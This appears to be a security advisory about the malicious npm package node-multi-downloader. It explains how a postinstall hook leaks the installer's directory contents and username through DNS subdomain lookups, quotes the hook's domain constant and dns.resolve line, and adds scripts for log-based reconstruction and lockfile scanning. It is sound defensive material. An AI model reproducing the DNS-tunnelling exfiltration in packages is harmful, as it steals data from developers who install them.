VYPR

npm · Malicious package advisory

Malware

node-multi-downloader

MAL-2026-5735

Malicious code in node-multi-downloader (npm)

Details


---

## Source: amazon-inspector (8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68)
On `npm install`, this package's postinstall hook (`node index.js`) hex-encodes the installer's current working directory, the first 15 entries of that directory, and `os.userInfo().username`, splits the encoded data into DNS-label-sized chunks, and leaks each chunk via a DNS A-record lookup for a subdomain of the attacker-controlled domain `uqlyosvp1f9.oob.evilsec.xyz`. The hardcoded out-of-band domain is bound at index.js line 1 (`const D = "uqlyosvp1f9.oob.evilsec.xyz"`), and index.js line 8 calls `dns.resolve(`${chunk}.${tag}${i}.${D}`, 'A', ...)` to transmit the encoded data, so the query name itself carries the payload and the lookup leaks it whether or not an answer ever comes back. Encoding data in DNS subdomains is a well-known way around HTTP egress filtering: a build host that cannot reach the internet directly usually still resolves names through a recursive resolver, which forwards the query to the attacker's authoritative name server. The package metadata (description "RSI package!", anonymous author, release-candidate version) provides no legitimate purpose that would justify reading installer filesystem contents and identity at install time.
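The practical question for a responder is what left the network. Because the payload is in the query name, resolver query logs are enough to reconstruct it. The following is an added example, not code from the advisory or the package: it parses BIND-style query-log lines, keeps only lookups under the out-of-band domain, decodes the hex label and reassembles chunks per client and per tag in index order. The log format, the tag names (`cwd`, `user`) and the sample lines are constructed assumptions; the advisory only shows the `${chunk}.${tag}${i}.${D}` name layout.

```javascript
// Added example: reconstruct DNS-tunnelled exfiltration from resolver query logs.
// Assumptions (not from the advisory): the BIND-style log format below and the
// tag names; the advisory only documents the `${chunk}.${tag}${i}.${D}` layout.
const EXFIL_DOMAIN = "uqlyosvp1f9.oob.evilsec.xyz";

// Constructed sample log lines, not real traffic. Two chunks carry "/home/dev/app"
// under tag "cwd", one chunk carries "alice" under tag "user".
const SAMPLE_LOG = [
  "client 10.0.0.5#51324: query: 2f686f6d652f.cwd0.uqlyosvp1f9.oob.evilsec.xyz IN A +",
  "client 10.0.0.5#51325: query: 6465762f617070.cwd1.uqlyosvp1f9.oob.evilsec.xyz IN A +",
  "client 10.0.0.5#51326: query: 616c696365.user0.uqlyosvp1f9.oob.evilsec.xyz IN A +",
  "client 10.0.0.7#40001: query: registry.npmjs.org IN A +",
].join("\n");

const QUERY_RE = /client ([\d.]+)#\d+: query: (\S+) IN \w+/;
const HEX_LABEL_RE = /^(?:[0-9a-f]{2})+$/i;   // even-length hex, as produced by hex-encoding bytes
const TAG_LABEL_RE = /^([a-z]+)(\d+)$/i;       // `${tag}${i}`

// Parse one log line into {client, qname}, or null if it is not a query record.
function parseQueryLine(line) {
  const m = QUERY_RE.exec(line);
  return m ? { client: m[1], qname: m[2].replace(/\.$/, "") } : null;
}

// Split a qname into {chunk, tag, index} if it is an exfil lookup under `domain`.
function parseExfilName(qname, domain = EXFIL_DOMAIN) {
  const suffix = "." + domain.toLowerCase();
  const lower = qname.toLowerCase();
  if (!lower.endsWith(suffix)) return null;
  const labels = lower.slice(0, -suffix.length).split(".");
  if (labels.length !== 2) return null;
  const [chunk, tagLabel] = labels;
  const t = TAG_LABEL_RE.exec(tagLabel);
  if (!t || !HEX_LABEL_RE.test(chunk)) return null;
  return { chunk, tag: t[1], index: parseInt(t[2], 10) };
}

// Reassemble the leaked values: { client: { tag: decodedString } }.
// Chunks are ordered by index; a gap means the resolver log missed a query.
function reconstructExfil(logText, domain = EXFIL_DOMAIN) {
  const byClient = new Map();
  for (const line of logText.split("\n")) {
    const q = parseQueryLine(line);
    if (!q) continue;
    const e = parseExfilName(q.qname, domain);
    if (!e) continue;
    if (!byClient.has(q.client)) byClient.set(q.client, new Map());
    const tags = byClient.get(q.client);
    if (!tags.has(e.tag)) tags.set(e.tag, []);
    tags.get(e.tag).push(e);
  }
  const result = {};
  for (const [client, tags] of byClient) {
    result[client] = {};
    for (const [tag, chunks] of tags) {
      chunks.sort((a, b) => a.index - b.index);
      const hex = chunks.map((c) => c.chunk).join("");
      result[client][tag] = Buffer.from(hex, "hex").toString("utf8");
    }
  }
  return result;
}

console.log(JSON.stringify(reconstructExfil(SAMPLE_LOG), null, 2));
```

Run it with `node` against an exported query log; the client addresses that appear in the output are the hosts that ran the postinstall hook. The domain filter is deliberately exact, but the same hex-label check (a long label made only of hex digits under an unfamiliar zone) is a reasonable generic alert for other DNS exfiltration tooling.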

Compromised versions (1)

  • 5.0.14-rc.3

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.
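Whether a machine is in scope depends on whether the compromised version was ever resolved into its dependency tree, and a transitive pull-in is easy to miss with a grep of package.json. The following is an added example, not part of the advisory: it walks a package-lock.json in both the v1 (`dependencies` tree) and v2/v3 (`packages` map) layouts and reports every install path holding `node-multi-downloader` at an affected version. The two lockfiles are constructed sample inputs.

```javascript
// Added example: find the compromised release in a package-lock.json.
// Not from the advisory; the lockfile objects below are constructed samples.
const ADVISORY = { name: "node-multi-downloader", versions: new Set(["5.0.14-rc.3"]) };

// Constructed lockfileVersion 3 file: the bad version is nested under another
// dependency, which is where a transitive pull-in hides.
const SAMPLE_LOCK_V3 = {
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", dependencies: { "some-lib": "^1.0.0" } },
    "node_modules/some-lib": {
      version: "1.2.0",
      dependencies: { "node-multi-downloader": "5.0.14-rc.3" },
    },
    "node_modules/some-lib/node_modules/node-multi-downloader": {
      version: "5.0.14-rc.3",
      hasInstallScript: true,
    },
  },
};

// Constructed lockfileVersion 1 file with a version not listed in the advisory.
const SAMPLE_LOCK_V1 = {
  name: "demo-app",
  lockfileVersion: 1,
  dependencies: {
    "node-multi-downloader": { version: "5.0.13", dependencies: {} },
  },
};

// lockfileVersion 1: recursive "dependencies" tree keyed by package name.
function* walkV1(deps, prefix = "node_modules") {
  for (const [name, entry] of Object.entries(deps || {})) {
    const path = `${prefix}/${name}`;
    yield { path, name, version: entry.version };
    if (entry.dependencies) yield* walkV1(entry.dependencies, `${path}/node_modules`);
  }
}

// lockfileVersion 2/3: flat "packages" map keyed by install path. The package
// name is the last path segment after "node_modules/" (keeps @scope/name intact)
// unless the entry carries an explicit name, as aliased installs do.
function* walkV2(packages) {
  const marker = "node_modules/";
  for (const [path, entry] of Object.entries(packages || {})) {
    if (path === "") continue; // root project entry
    const name = entry.name || path.slice(path.lastIndexOf(marker) + marker.length);
    yield { path, name, version: entry.version };
  }
}

// Return every install path whose name and version match the advisory.
function findCompromised(lock, advisory = ADVISORY) {
  const walker = lock.lockfileVersion >= 2 ? walkV2(lock.packages) : walkV1(lock.dependencies);
  const hits = [];
  for (const pkg of walker) {
    if (pkg.name === advisory.name && advisory.versions.has(pkg.version)) hits.push(pkg);
  }
  return hits;
}

console.log("v3 hits:", findCompromised(SAMPLE_LOCK_V3));
console.log("v1 hits:", findCompromised(SAMPLE_LOCK_V1));
```

To scan a real file, parse it with `JSON.parse` and pass the object to `findCompromised`. A hit in any lockfile, including one on a CI runner's cache, means that host ran the postinstall hook and should be treated as compromised per the advisory; an empty result only says the current lockfile is clean, not that an earlier install never happened.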